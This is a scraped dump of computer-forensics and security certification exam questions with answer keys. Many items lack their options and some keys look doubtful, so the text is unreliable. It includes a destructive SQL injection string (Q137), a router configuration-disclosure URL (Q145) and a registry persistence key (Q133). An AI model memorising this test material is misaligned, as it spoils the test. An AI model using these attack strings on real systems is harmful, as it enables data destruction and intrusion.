www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 82
When a file is deleted by Windows Explorer or through the MS-DOS delete command, the operating system inserts _______________ in the first letter position
of the filename in the FAT database.
A. A Capital X
B. A Blank Space
C. The Underscore Symbol
D. The lowercase Greek Letter Sigma (s)
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 83
While working for a prosecutor, what do you think you should do if the evidence you found appears to be exculpatory and is not being released to the defense?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 84
In Microsoft file structures, sectors are grouped together to form:
A. Clusters
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
B. Drives
C. Bitstreams
D. Partitions
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 85
What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS disk?
A. A compressed file
B. A Data stream file
C. An encrypted file
D. A reserved file
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 86
An Employee is suspected of stealing proprietary information belonging to your company that he had no rights to possess. The information was stored on the
Employees Computer that was protected with the NTFS Encrypted File System (EFS) and you had observed him copy the files to a floppy disk just before
leaving work for the weekend. You detain the Employee before he leaves the building and recover the floppy disks and secure his computer. Will you be able to
break the encryption so that you can verify that that the employee was in possession of the proprietary information?
A. EFS uses a 128-bit key that can't be cracked, so you will not be able to recover the information
B. When the encrypted file was copied to the floppy disk, it was automatically unencrypted, so you can recover the information.
C. The EFS Revoked Key Agent can be used on the Computer to recover the information
D. When the Encrypted file was copied to the floppy disk, the EFS private key was also copied to the floppy disk, so you can recover the information.
Correct Answer: B
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Section: (none)
Explanation
Explanation/Reference:
QUESTION 87
When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:
A. Recycle Bin
B. MSDOS.sys
C. BIOS
D. Case files
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 88
You are called in to assist the police in an investigation involving a suspected drug dealer. The suspects house was searched by the police after a warrant was
obtained and they located a floppy disk in the suspects bedroom. The disk contains several files, but they appear to be password protected. What are two
common methods used by password cracking software that you can use to obtain the password?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 89
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
When reviewing web logs, you see an entry for resource not found in the HTTP status code filed. What is the actual error code that you would see in the log for
resource not found?
A. 202
B. 404
C. 505
D. 909
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 90
Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory resident and do write themselves to the hard drive, if you
turn the system off they disappear. In a lab environment, which of the following options would you suggest as the most appropriate to overcome the problem of
capturing volatile memory?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 91
You are working in the security Department of law firm. One of the attorneys asks you about the topic of sending fake email because he has a client who has
been charged with doing just that. His client alleges that he is innocent and that there is no way for a fake email to actually be sent. You inform the attorney that
his client is mistaken and that fake email is possibility and that you can prove it. You return to your desk and craft a fake email to the attorney that appears to
come from his boss. What port do you send the email to on the company SMTP server?
A. 10
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
B. 25
C. 110
D. 135
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 92
This is original file structure database that Microsoft originally designed for floppy disks. It is written to the outermost track of a disk and contains information
about each file stored on the drive.
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 93
What should you do when approached by a reporter about a case that you are working on or have worked on?
Correct Answer: A
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
Section: (none)
Explanation
QUESTION 94
Which of the following refers to the data that might still exist in a cluster even though the original file has been overwritten by another file?
A. Sector
B. Metadata
C. MFT
D. Slack Space
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 95
A state department site was recently attacked and all the servers had their disks erased. The incident response team sealed the area and commenced
investigation. During evidence collection they came across a zip disks that did not have the standard labeling on it. The incident team ran the disk on an isolated
system and found that the system disk was accidentally erased. They decided to call in the FBI for further investigation. Meanwhile, they short listed possible
suspects including three summer interns. Where did the incident team go wrong?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 96
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
When investigating a Windows System, it is important to view the contents of the page or swap file because:
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 97
Chris has been called upon to investigate a hacking incident reported by one of his clients. The company suspects the involvement of an insider accomplice in
the attack. Upon reaching the incident scene, Chris secures the physical area, records the scene using visual media. He shuts the system down by pulling the
power plug so that he does not disturb the system in any way. He labels all cables and connectors prior to disconnecting any. What do you think would be the
next sequence of events?
A. Connect the target media; prepare the system for acquisition; Secure the evidence; Copy the media
B. Prepare the system for acquisition; Connect the target media; copy the media; Secure the evidence
C. Connect the target media; Prepare the system for acquisition; Secure the evidence; Copy the media
D. Secure the evidence; prepare the system for acquisition; Connect the target media; copy the media
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 98
The use of warning banners helps a company avoid litigation by overcoming an employee assumed __________________________. When connecting to the
company's intranet, network or Virtual Private Network(VPN) and will allow the company's investigators to monitor, search and retrieve information stored within
the network.
A. Right to work
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
B. Right of free speech
C. Right to Internet Access
D. Right of Privacy
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 99
What does mactime, an essential part of the coroner's toolkit do?
A. It traverses the file system and produces a listing of all files based on the modification, access and change timestamps
B. It can recover deleted file space and search it for data. However, it does not allow the investigator to preview them
C. The tools scans for i-node information, which is used by other tools in the tool kit
D. It is too specific to the MAC OS and forms a core component of the toolkit
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 100
One way to identify the presence of hidden partitions on a suspect's hard drive is to:
A. Add up the total size of all known partitions and compare it to the total size of the hard drive
B. Examine the FAT and identify hidden partitions by noting an H in the partition Type field
C. Examine the LILO and note an H in the partition Type field
D. It is not possible to have hidden partitions on a hard drive
Correct Answer: A
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 101
What information do you need to recover when searching a victim’s computer for a crime committed with specific e-mail message?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 102
Melanie was newly assigned to an investigation and asked to make a copy of all the evidence from the compromised system. Melanie did a DOS copy of all the
files on the system. What would be the primary reason for you to recommend a disk imaging tool?
A. A disk imaging tool would check for CRC32s for internal self-checking and validation and have MD5 checksum
B. Evidence file format will contain case data entered by the examiner and encrypted at the beginning of the evidence file
C. A simple DOS copy will not include deleted files, file slack and other information
D. There is no case for an imaging tool as it will use a closed, proprietary format that if compared to the original will not match up sector for sector
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 103
You are employed directly by an attorney to help investigate an alleged sexual harassment case at a large pharmaceutical manufacture. While at the corporate
office of the company, the CEO demands to know the status of the investigation. What prevents you from discussing the case with the CEO?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. the attorney-work-product rule
B. Good manners
C. Trade secrets
D. ISO 17799
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 104
One technique for hiding information is to change the file extension from the correct one to one that might not be noticed by an investigator. For example,
changing a .jpg extension to a .doc extension so that a picture file appears to be a document. What can an investigator examine to verify that a file has the
correct extension?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 105
This organization maintains a database of hash signatures for known software.
Correct Answer: C
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Section: (none)
Explanation
Explanation/Reference:
QUESTION 106
The ____________________ refers to handing over the results of private investigations to the authorities because of indications of criminal activity.
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 107
You are working as Computer Forensics investigator and are called by the owner of an accounting firm to investigate possible computer abuse by one of the
firm’s employees. You meet with the owner of the firm and discover that the company has never published a policy stating that they reserve the right to
inspect their computing assets at will. What do you do?
A. Inform the owner that conducting an investigation without a policy is not a problem because the company is privately owned
B. Inform the owner that conducting an investigation without a policy is a violation of the 4th amendment
C. Inform the owner that conducting an investigation without a policy is a violation of the employee’s expectation of privacy
D. Inform the owner that conducting an investigation without a policy is not a problem because a policy is only necessary for government agencies
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 108
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
During the course of a corporate investigation, you find that an Employee is committing a crime. Can the Employer file a criminal complaint with Police?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 109
____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.
A. Network Forensics
B. Computer Forensics
C. Incident Response
D. Event Reaction
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 110
What is the name of the Standard Linux Command that is also available as windows application that can be used to create bit-stream images?
A. mcopy
B. image
C. MD5
D. dd
Correct Answer: D
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Section: (none)
Explanation
Explanation/Reference:
QUESTION 111
To preserve digital evidence, an investigator should ____________________.
A. Make two copies of each evidence item using a single imaging tool
B. Make a single copy of each evidence item using an approved imaging tool
C. Make two copies of each evidence item using different imaging tools
D. Only store the original evidence item
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 112
Profiling is a forensics technique for analyzing evidence with the goal of identifying the perpetrator from their various activity. After a computer has been
compromised by a hacker, which of the following would be most important in forming a profile of the incident?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 113
Printing under a Windows Computer normally requires which one of the following files types to be created?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. EME
B. MEM
C. EMF
D. CME
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 114
An Expert witness give an opinion if:
A. The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors
B. To define the issues of the case for determination by the finder of fact
C. To stimulate discussion between the consulting expert and the expert witness
D. To deter the witness form expanding the scope of his or her investigation beyond the requirements of the case
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 115
When using Windows acquisitions tools to acquire digital evidence, it is important to use a well-tested hardware write-blocking device to:
Correct Answer: D
Section: (none)
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation
Explanation/Reference:
QUESTION 116
Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document.
What is that code called?
A. Globally unique ID
B. Microsoft Virtual Machine Identifier
C. Personal Application Protocol
D. Individual ASCII string
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 117
You have completed a forensic investigation case. You would like to destroy the data contained in various disks at the forensics lab due to sensitivity of the case.
How would you permanently erase the data on the hard disk?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 118
You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
most interested in when trying to trace the source of the message?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 119
You are working as a Computer forensics investigator for a corporation on a computer abuse case. You discover evidence that shows the subject of your
investigation is also embezzling money from the company. The company CEO and the corporate legal counsel advise you to contact law enforcement and
provide them with the evidence that you have found. The law enforcement officer that responds requests that you put a network sniffer on your network and
monitor all traffic to the subject's computer. You inform the officer that you will not be able to comply with that request because doing so would:
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 120
A law enforcement officer may only search for and seize criminal evidence with _______________________, which are facts or circumstances that would lead a
reasonable person to believe a crime has been committed or is about to be committed, evidence of the specific crime exists and the evidence of the specific
crime exists at the place to be searched.
A. Mere Suspicion
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
B. A preponderance of the evidence
C. Probable cause
D. Beyond a reasonable doubt
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 121
The police believe that Melvin Matthew has been obtaining unauthorized access to computers belonging to numerous computer software and computer operating
systems manufacturers, cellular telephone manufacturers, Internet Service Providers and Educational Institutions. They also suspect that he has been stealing,
copying and misappropriating proprietary computer software belonging to the several victim companies. What is preventing the police from breaking down the
suspects door and searching his home and seizing all of his computer equipment if they have not yet obtained a warrant?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 122
When cataloging digital evidence, the primary goal is to
Correct Answer: B
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Section: (none)
Explanation
Explanation/Reference:
QUESTION 123
You are conducting an investigation of fraudulent claims in an insurance company that involves complex text searches through large numbers of documents.
Which of the following tools would allow you to quickly and efficiently search for a string within a file on the bitmap image of the target computer?
A. Stringsearch
B. grep
C. dir
D. vim
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 124
As a CHFI professional, which of the following is the most important to your professional reputation?
A. Your Certifications
B. The correct, successful management of each and every case
C. The free that you charge
D. The friendship of local law enforcement officers
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 125
In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
(ISP). You contact ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?
A. The ISP can investigate anyone using their service and can provide you with assistance
B. The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you
without a warrant
C. The ISP can't conduct any type of investigations on anyone and therefore can't assist you
D. ISP's never maintain log files so they would be of no use to your investigation
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 126
You are assisting in the investigation of a possible Web Server Hack. The company who called you stated that customers reported to them that whenever they
entered the web address of the company in their browser, what they received was a porno graphic web site. The company checked the web server and nothing
appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS
cache of the name resolution servers, resulting in those servers directing users to the wrong web site?
A. ARP Poisoning
B. DNS Poisoning
C. HTTP redirect attack
D. IP Spoofing
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 127
You are working as an independent computer forensics investigator and receive a call from a systems administrator for a local school system requesting your
assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer lab. When
you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a simple backup copy of the hard drive in the PC and put it
on this drive and requests that you examine that drive for evidence of the suspected images. You inform him that a simple backup copy will not provide deleted
files or recover file fragments.
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceedings?
A. Bit-stream Copy
B. Robust Copy
C. Full backup Copy
D. Incremental Backup Copy
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 128
Law enforcement officers are conducting a legal search for which a valid warrant was obtained.
While conducting the search, officers observe an item of evidence for an unrelated crime that was not included in the warrant. The item was clearly visible to the
officers and immediately identified as evidence. What is the term used to describe how this evidence is admissible?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 129
Microsoft Outlook maintains email messages in a proprietary format in what type of file?
A. .email
B. .mail
C. .pst
D. .doc
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 130
The efforts to obtain information before a trail by demanding documents, depositions, questioned and answers written under oath, written requests for admissions
of fact and examination of the scene is a description of what legal term?
A. Detection
B. Hearsay
C. Spoliation
D. Discovery
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
Section: (none)
Explanation
QUESTION 131
The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 132
You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The
complainant has printer out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer
because you need access to the _________________________ in order to track the emails back to the suspect.
A. Routing Table
B. Firewall log
C. Configuration files
D. Email Header
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 133
Hackers can gain access to Windows Registry and manipulate user passwords, DNS settings, access rights or others features that they may need in order to
accomplish their objectives. One simple method for loading an application at startup is to add an entry (Key) to the following Registry Hive:
A. HKEY_LOCAL_MACHINE\hardware\windows\start
B. HKEY_LOCAL_USERS\Software\Microsoft\old\Version\Load
C. HKEY_CURRENT_USER\Microsoft\Default
D. HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVersion\Run
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 134
Which of the following file system is used by Mac OS X?
A. EFS
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
B. HFS+
C. EXT2
D. NFS
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 135
When you are running a vulnerability scan on a network and the IDS cuts off your connection, what type of IDS is being used?
A. Passive IDS
B. Active IDS
C. Progressive IDS
D. NIPS
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 136
Simon is a former employee of Trinitron XML Inc. He feels he was wrongly terminated and wants to hack into his former company's network. Since Simon
remembers some of the server names, he attempts to run the axfr and ixfr commands using DIG. What is Simon trying to accomplish here?
Correct Answer: C
Section: (none)
Explanation
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation/Reference:
QUESTION 137
What will the following command produce on a website login page? SELECT email, passwd, login_id, full_name FROM members WHERE email =
'someone@somehwere.com'; DROP TABLE members; --'
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 138
You setup SNMP in multiple offices of your company. Your SNMP software manager is not receiving data from other offices like it is for your main office. You
suspect that firewall changes are to blame. What ports should you open for
SNMP to work through Firewalls? (Choose two.)
A. 162
B. 161
C. 163
D. 160
Correct Answer: AB
Section: (none)
Explanation
Explanation/Reference:
QUESTION 139
You are carrying out the last round of testing for your new website before it goes live. The website has many dynamic pages and connects to a SQL backend that
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
accesses your product inventory in a database. You come across a web security site that recommends inputting the following code into a search field on web
pages to check for vulnerabilities: When you type this and click on search, you receive a pop-up window that says: "This is a test." What is the result of this test?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 140
If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 141
Michael works for Kimball Construction Company as senior security analyst. As part of yearly security audit, Michael scans his network for vulnerabilities. Using
Nmap, Michael conducts XMAS scan and most of the ports scanned do not give a response. In what state are these ports?
A. Closed
B. Open
C. Stealth
D. Filtered
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 142
You are assisting a Department of Defense contract company to become compliant with the stringent security policies set by the DoD. One such strict rule is that
firewalls must only allow incoming connections that were first initiated by internal computers. What type of firewall must you implement to abide by this policy?
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 143
Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests.
What type of scan is Jessica going to perform?
A. Tracert
B. Smurf scan
C. Ping trace
D. ICMP ping sweep
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 144
You work as an IT security auditor hired by a law firm in Boston to test whether you can gain access to sensitive information about the company clients. You
have rummaged through their trash and found very little information. You do not want to set off any alarms on their network, so you plan on performing passive
foot printing against their Web servers. What tool should you use?
A. Ping sweep
B. Nmap
C. Netcraft
D. Dig
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 145
You are a security analyst performing a penetration tests for a company in the Midwest. After some initial reconnaissance, you discover the IP addresses of
some Cisco routers used by the company. You type in the following URL that includes the IP address of one of the routers: http://172.168.4.131/level/99/exec/
show/config
After typing in this URL, you are presented with the entire configuration file for that router. What have you discovered?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 146
What is the following command trying to accomplish?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. Verify that UDP port 445 is open for the 192.168.0.0 network
B. Verify that TCP port 445 is open for the 192.168.0.0 network
C. Verify that NETBIOS is running for the 192.168.0.0 network
D. Verify that UDP port 445 is closed for the 192.168.0.0 network
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 147
You are the network administrator for a small bank in Dallas, Texas. To ensure network security, you enact a security policy that requires all users to have 14
character passwords. After giving your users 2 weeks notice, you change the Group Policy to force 14 character passwords. A week later you dump the SAM
database from the standalone server and run a password-cracking tool against it. Over 99% of the passwords are broken within an hour. Why were these
passwords cracked so Quickly?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 148
An "idle" system is also referred to as what?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 149
Larry is an IT consultant who works for corporations and government agencies. Larry plans on shutting down the city's network using BGP devices and zombies?
What type of Penetration Testing is Larry planning to carry out?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 150
John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the
file server. He enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to Error! Reference source not found. What information will
he be able to gather from this?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 151
Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis, he needs to send PDF documents containing sensitive information
through E-mail to his customers. Bill protects the PDF documents with a password and sends them to their intended recipients. Why PDF passwords do not offer
maximum protection?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 152
Meyer Electronics Systems just recently had a number of laptops stolen out of their office. On these laptops contained sensitive corporate information regarding
patents and company strategies. A month after the laptops were stolen, a competing company was found to have just developed products that almost exactly
duplicated products that Meyer produces. What could have prevented this information from being stolen from the laptops?
A. EFS Encryption
B. DFS Encryption
C. IPS Encryption
D. SDW Encryption
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 153
Kimberly is studying to be an IT security analyst at a vocational school in her town. The school offers many different programming as well as networking
languages. What networking protocol language should she learn that routers utilize?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. ATM
B. UDP
C. BPG
D. OSPF
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 154
What is the target host IP in the following command?
A. 172.16.28.95
B. 10.10.150.1
C. Firewalk does not scan target hosts
D. This command is using FIN packets, which cannot scan target hosts
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 155
George is a senior security analyst working for a state agency in Florida. His state's congress just passed a bill mandating every state agency to undergo a
security audit annually. After learning what will be required, George needs to implement an IDS as soon as possible before the first audit occurs. The state bill
requires that an IDS with a "time-based induction machine" be used.
What IDS feature must George implement to meet this requirement?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 156
John is using Firewalk to test the security of his Cisco PIX firewall. He is also utilizing a sniffer located on a subnet that resides deep inside his network. After
analyzing the sniffer log files, he does not see any of the traffic produced by Firewalk. Why is that?
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 157
After undergoing an external IT audit, George realizes his network is vulnerable to DDoS attacks. What countermeasures could he take to prevent DDoS
attacks?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
QUESTION 158
George is performing security analysis for Hammond and Sons LLC. He is testing security vulnerabilities of their wireless network. He plans on remaining as
"stealthy" as possible during the scan. Why would a scanner like Nessus is not recommended in this situation?
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 159
At what layer of the OSI model do routers function on?
A. 4
B. 3
C. 1
D. 5
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 160
Frank is working on a vulnerability assessment for a company on the West coast. The company hired Frank to assess its network security through scanning, pen
tests, and vulnerability assessments. After discovering numerous known vulnerabilities detected by a temporary IDS he set up, he notices a number of items that
show up as unknown but Questionable in the logs. He looks up the behavior on the Internet, but cannot find anything related. What organization should Frank
submit the log to find out if it is a new vulnerability or not?
A. APIPA
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
B. IANA
C. CVE
D. RIPE
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 161
George is the network administrator of a large Internet company on the west coast. Per corporate policy, none of the employees in the company are allowed to
use FTP or SFTP programs without obtaining approval from the IT department. Few managers are using SFTP program on their computers. Before talking to his
boss, George wants to have some proof of their activity. George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network.
What filter should George use in Ethereal?
Correct Answer: D
Section: (none)
Explanation
Explanation/Reference:
QUESTION 162
Your company uses Cisco routers exclusively throughout the network. After securing the routers to the best of your knowledge, an outside security firm is brought
in to assess the network security.
Although they found very few issues, they were able to enumerate the model, OS version, and capabilities for all your Cisco routers with very little effort. Which
feature will you disable to eliminate the ability to enumerate this information on your Cisco routers?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
D. Simple Network Management Protocol
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 163
In Linux, what is the smallest possible shellcode?
A. 24 bytes
B. 8 bytes
C. 800 bytes
D. 80 bytes
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
Section: (none)
Explanation
QUESTION 164
Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify
the results of the vulnerability test.
The second utility executes five known exploits against his network in which the vulnerability analysis said were not exploitable. What kind of results did Jim
receive from his vulnerability analysis?
A. False negatives
B. False positives
C. True negatives
D. True positives
Correct Answer: A
Section: (none)
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Explanation
Explanation/Reference:
QUESTION 165
You work as a penetration tester for Hammond Security Consultants. You are currently working on a contract for the state government of California. Your next
step is to initiate a DoS attack on their network. Why would you want to initiate a DoS attack on a system you are testing?
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 166
Why are Linux/Unix based computers better to use than Windows computers for idle scanning?
Correct Answer: C
Section: (none)
Explanation
Explanation/Reference:
QUESTION 167
What operating system would respond to the following command?
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
A. Windows 95
B. FreeBSD
C. Windows XP
D. Mac OS X
Correct Answer: B
Section: (none)
Explanation
Explanation/Reference:
QUESTION 168
Paul's company is in the process of undergoing a complete security audit including logical and physical security testing. After all logical tests were performed; it
is now time for the physical round to begin. None of the employees are made aware of this round of testing. The security-auditing firm sends in a technician
dressed as an electrician. He waits outside in the lobby for some employees to get to work and follows behind them when they access the restricted areas. After
entering the main office, he is able to get into the server room telling the IT manager that there is a problem with the outlets in that room. What type of attack
has the technician performed?
A. Tailgating
B. Backtrapping
C. Man trap attack
D. Fuzzing
Correct Answer: A
Section: (none)
Explanation
Explanation/Reference:
QUESTION 169
On Linux/Unix based Web servers, what privilege should the daemon service be run under?
A. Guest
B. Root
C. You cannot determine what privilege runs the daemon service
D. Something other than root
www.vceplus.com - VCE Exam Simulator - Download A+ VCE (latest) free Open VCE Exams - VCE to PDF Converter - PDF Online
Correct Answer: D
Section: (none)
